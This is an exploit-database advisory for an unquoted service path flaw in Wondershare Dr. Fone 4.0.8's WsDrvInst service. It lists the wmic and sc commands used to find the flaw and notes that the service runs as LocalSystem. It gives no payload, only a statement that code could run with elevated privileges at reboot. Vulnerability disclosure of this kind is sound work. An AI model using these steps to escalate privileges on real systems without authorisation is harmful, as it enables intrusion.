Share
## https://sploitus.com/exploit?id=PACKETSTORM:167776
# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path  
# Discovery Date: 2022-05-07  
# Discovery by: Esant1490  
# Vendor Homepage: https://drfone.wondershare.net  
# Software Link : https://download.wondershare.net/drfone_full4008.exe  
# Tested Version: 4.0.8  
# Tested on OS: Windows 10 Pro x64 en  
# Vulnerability Type: Unquoted Service Path  
  
# Find the discover Unquoted Service Path Vulnerability:  
  
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"  
|findstr /i /v "C:\Windows\\" |findstr /i /v """  
  
Wondershare Install Assist Service Wondershare InstallAssist  
C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto  
  
Wondershare Application Framework Service WsAppService C:\Program Files  
(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto  
Wondershare Application Update Service 3.0  
  
WsAppService3 C:\Program Files  
(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto  
  
Wondershare Driver Install Service WsDrvInst C:\Program Files  
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto  
  
# Service info:  
  
C:\>sc qc WsDrvInst  
[SC] QueryServiceConfig CORRECTO  
  
NOMBRE_SERVICIO: WsDrvInst  
TIPO : 10 WIN32_OWN_PROCESS  
TIPO_INICIO : 2 AUTO_START  
CONTROL_ERROR : 1 NORMAL  
NOMBRE_RUTA_BINARIO: C:\Program Files  
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe  
GRUPO_ORDEN_CARGA :  
ETIQUETA : 0  
NOMBRE_MOSTRAR : Wondershare Driver Install Service  
DEPENDENCIAS : RPCSS  
NOMBRE_INICIO_SERVICIO: LocalSystem  
  
#Exploit:  
  
A successful attempt to exploit this vulnerability could allow to execute  
code during startup or reboot with the elevated privileges.